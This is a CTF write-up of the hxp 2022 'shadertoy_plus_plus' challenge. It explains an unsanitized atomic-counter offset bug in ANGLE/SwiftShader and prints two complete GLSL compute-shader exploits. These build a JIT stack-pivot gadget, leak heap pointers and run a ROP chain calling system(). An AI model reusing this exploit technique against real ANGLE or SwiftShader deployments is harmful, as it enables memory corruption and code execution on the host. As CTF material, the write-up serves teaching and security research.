hxp CTF 2022: shadertoy_plus_plus

Who doesn’t love shadertoy? https://www.shadertoy.com/view/cdG3WW

Teams are provided with a ShaderToy-like service which accepts GLES3.1 Compute shaders. Clients need to find a “0day” in the two main libraries — Google’s ANGLE and SwiftShader — and exploit it to pop a shell.

Warning: This is going to be a bit superficial look into ANGLE and SwiftShader.

For setting up the challenge, ANGLE is used for implementing GLES3.1 and SwiftShader is used for emulating shaders on the CPU. This setup is not much different from what WebGL could be on some browsers, and it has previously been shown to be an attack vector for browsers. The service does very little: setups a context, creates a texture to render to, gives a source of entropy (time), takes four shaders, renders them, converts them to PNG using fpng and finally sends them as base64-encoded data. When creating the EGL context, the client requests the EGL_CONTEXT_OPENGL_ROBUST_ACCESS_EXT extension which results in added validation of accesses in GPU programs and APIs.

The ANGLE and SwiftShader projects are admittedly large, but it was not expected that one goes through all of the code and we had also prepared a series of hints for players:

Hint 1: If it were about WebGL, we wouldn't have made a challenge. It's GL ES 3.1 with a WebGL Compatibility Context.
Hint 2: I wonder, is the context really _robust_?
Hint 3: Do we actually sanitize all accesses when implementing robustness?

Seven hours into the CTF somebody already had an arbitrary read/write primitive, so we hold off from sharing hints.

At a high level, the projects operate in the following way:

  • ANGLE receives API calls, performs validation according to the GLES spec and dispatches to the respective backend (GL, VK, DX) on a need-basis (e.g. when state is out-of-sync).
  • The backend here is the Vulkan layer in ANGLE which will translate the calls to the VK API and invoke the Vulkan API implementation, in this case SwiftShader.
  • To support shaders for all different shading languages (various GLSL versions, HLSL, SPIRV), ANGLE implements a transpiler which parses the shader and translates it to the target language.
  • The compiler implements a variety of transformation and validation passes to prevent program misuses, workaround GPU bugs, deter invalid accesses, emulate functions and optimize code.
  • For our purpose, one key pass is the ClampIndirectIndices pass. This pass clamps dynamic array indices. Static out-of-bounds accesses are also sanitized during compilation time.
  • After passes are applied, the program would be translated to SPIRV in OutputSPIRV.cpp.
  • SwiftShader will take the SPIRV, emit JIT-ed ELF program, and load it.
  • The SwiftShader context is also ROBUSTNESS-aware, so it will do its own sanitization. For different types of accesses it will select a different behavior: Nullify, RobustBufferAccess, UndefinedValue, UndefinedBehavior. UndefinedValue and UndefinedBehavior are not secure.

The shadertoy_plus_plus service really only receives shaders and this is the only attack vector: provide a crafted shader and exploit some bug in the chain. The attack surface of the compiler and shader runtime is huge: transpiler may be buggy, high number of type of accesses and something may be missed, buggy JIT, incompatible or incorrect order of compiler passes. The possibility of such a bug is increased by the fact that WebGL does not expose GLES3.1, and thus that code is likely a lot less tested.

A feature, new in GLES3.1, is atomic counters. To use atomic counters, the client allocates an “atomic” buffer and accesses it from the shader using the atomic builtins (atomicCounterIncrement, …) at a specific offset. The access is not an array access, but the shader still can specify a buffer offset using the offset layout qualifier. This design bypases the ClampIndirectIndices pass from earlier and access sanitization is left to SwiftShader. Interestingly, SwiftShader also does not perform sanitization for atomic accesses.

This compute shader will segfault:

#version 310 es
layout(local_size_x=1) in;
layout(binding = 5, offset = 0x7000000) uniform atomic_uint brk_a;
void main() {
       atomicCounterIncrement(brk_a);
}

This bug allows arbitrary read and write on the heap. The same is possible also via SSBOs and using the atomicExchange accesses, but I realized this too late. This is clearly exploitable and it’s only about writing an exploit.

I needed to send two shaders.

This one is mainly for creating a stack-pivoting gadget in executable memory (JIT): push rax; pop rsp; ret.

#version 310 es

// Mostly copied from https://gist.github.com/julien/d7e71b837392f5239c6553098b5cac0c

precision highp image2D;
precision highp uimage2D;

layout(local_size_x=1) in;

layout(location = 0) uniform float time;
layout(binding = 8, rgba8) uniform writeonly image2D img;

float ball(vec2 p, float fx, float fy, float ax, float ay) {
	vec2 r = vec2(p.x + sin(time * fx) * ax, p.y + cos(time * fy) * ay);
	return 0.09 / length(r);
}

float renderPixel(vec2 p) {
	float col = 0.0;
	col += ball(p, 2.0, 2.0, 0.1, 0.5);
	col += ball(p, 1.5, 2.5, 0.2, 0.3);
	col += ball(p, 1.5, 0.5, 0.6, 0.7);
	col += ball(p, 0.1, .5, 0.6, 0.7);
	col = max(mod(col, 0.4), min(col, 1.0));
	return col;
}

layout(std430, binding = 16) volatile buffer Scratch { uint sc[0x4000000u]; };

uint gadget() {
	// Having these in a function prevents ANGLE from statically catching the out-of-bounds access.
	// But still this introduces a good ROP gadget into the JIT-ed code.
	// Such a gadget is almost impossible to find in memory.
	// push rax; pop rsp; ret
	uint off = 0x30d714u;
	return off;
}

void main() {
	sc[gadget()] = 1u;
	ivec2 dim = imageSize(img);
	float ratio = float(dim.x) / float(dim.y);
	for (int i = 0; i < dim.x; i++) {
		for (int j = 0; j < dim.y; j++) {
			vec2 q = vec2(float(i), float(j)) / vec2(float(dim.x), float(dim.y));
			vec2 p = -1.0 + 2.0 * q;
			p.x *= ratio;
			imageStore(img, ivec2(i, j), vec4(renderPixel(p)));
		}
	}
}

This one is the actual exploit.

#version 310 es

layout(local_size_x=1) in;

precision highp uimage2D;

// 508,  validation layer
layout(binding = 3, offset = 0x8060) uniform atomic_uint leak[2];

layout(binding = 5, offset = 0x7000000) uniform atomic_uint brk_a;

layout(binding = 6, offset = 0x3b6d0) uniform atomic_uint leak_buf[2];

layout(binding = 8, r32ui) uniform writeonly uimage2D img;

layout(std430, binding = 16) volatile buffer Scratch { uint sc[0x4000000u]; };

void setValue(atomic_uint s, uint target) {
	uint current = atomicCounter(s);
	if (target < current) {
		for (uint i = target; i < current; ++i) {
			atomicCounterDecrement(s);
		}
	} else {
		for (uint i = current; i < target; ++i) {
			atomicCounterIncrement(s);
		}
	}
}

void brk() {
	atomicCounter(brk_a);
}

uint gadget() {
	// Having these in a function prevents ANGLE from statically catching the out-of-bounds access.
	// But still this introduces a good ROP gadget into the JIT-ed code.
	// Such a gadget is almost impossible to find in memory.

	// push rax; pop rsp; ret
	uint off = 0x30d714u;
	return off;
}

void addWithCarry(uint a_low, uint a_high, uint b_low, uint b_high, out uint out_low, out uint out_high) {
	uint carry = 0u;
	uint low = a_low + b_low;
	if (low < a_low || low < b_low) {
		carry = 1u;
	}
	uint high = a_high + b_high + carry;
	out_low = low;
	out_high = high;
}

void subWithCarry(uint a_low, uint a_high, uint b_low, uint b_high, out uint out_low, out uint out_high) {
	uint carry = 0u;
	uint low = usubBorrow(a_low, b_low, carry);
	uint high = a_high - b_high - carry;
	out_low = low;
	out_high = high;
}

void write_gadget(uint index, uint base_low, uint base_high, int delta) {
	uint low, high;
	if (delta < 0) {
		subWithCarry(base_low, base_high, uint(-delta), 0u, low, high);
	} else {
		addWithCarry(base_low, base_high, uint(delta), 0u, low, high);
	}
	uint off = index * 2u;
	imageStore(img, ivec2(off, 0), uvec4(low));
	imageStore(img, ivec2(off + 1u, 0), uvec4(high));
}

void create_gadget_for_stack_pivot() {
	sc[gadget()] = 0x1234u;
}

void prepare_rop_chain(uint target_low, uint target_high) {
	int delta_pop_rdi = -0xab496b;
	uint leak_low = atomicCounter(leak[0]);
	uint leak_high = atomicCounter(leak[1]);

	uint buf_low = target_low;
	uint buf_high = target_high;

	// just to offset the stack
	const int delta_pop_rdx_rbx = -0xa4e827;
	write_gadget(0u, leak_low, leak_high, delta_pop_rdx_rbx);

	// This must be the stack pivot gadget
	const int delta_to_gadget = -0x66aa58;
	write_gadget(2u, leak_low, leak_high, delta_to_gadget);

	// pop rdi to point to 'cat flag.txt'
	write_gadget(3u, leak_low, leak_high, delta_pop_rdi);

	// Write ptr to 'cat flag.txt'
	write_gadget(4u, buf_low, buf_high, 0xa08);

	// ret sled
	for (uint i = 5u; i < 0x13eu; ++i) {
		write_gadget(i, leak_low, leak_high, delta_pop_rdi + 1);
	}

	// Write ptr to system
	write_gadget(0x13eu, leak_low, leak_high, -0xa8dff0);

	// Write 'cat flag.txt'
	write_gadget(0x141u, 0x20746163u, 0x67616c66u, 0);
	write_gadget(0x142u, 0x7478742eu, 0u, 0);
}

void overwrite_call(uint target_low, uint target_high) {
	setValue(leak[0u], target_low);
	setValue(leak[1u], target_high);
}

void main() {
	// Write this for debugging purposes only.
	imageStore(img, ivec2(0, 0), uvec4(0xdeaddeadu));
	imageStore(img, ivec2(1, 0), uvec4(0x11223344u));

	// Write this to help form a pointer quickly.
	imageStore(img, ivec2(4, 0), uvec4(0x88888888u));
	imageStore(img, ivec2(5, 0), uvec4(0x0000007fu));

	uint target_low = atomicCounter(leak_buf[0]);
	uint target_high = atomicCounter(leak_buf[1]);

	// Create gadget for stack pivoting.
	create_gadget_for_stack_pivot();

	// Create rop chain to call system("cat flag.txt")
	prepare_rop_chain(target_low, target_high);

	// Trigger call to gadget to start rop chain.
	overwrite_call(target_low, target_high);
}

The exploit first writes some memory for easy debugging when the exploit breaks after an update. Then it reads a pointer at offset 0x3b6d0 from buffer base pointer to read a pointer which leaks the img buffer. The create_gadget_for_stack_pivot is not strictly necessary since the other shaders also create the gadget. The next step creates a rop chain to print out the flag, and then just overwrites the function pointer to point to the push rax; pop rsp; ret gadget. The function pointer will be called on glFinish (I think).

Flag is: hxp{aBs7r4k71oN_On3_2_AbsTr4kt10n_N_Ne3d_t0_v4l1d4t3_aLl_0f_th3M}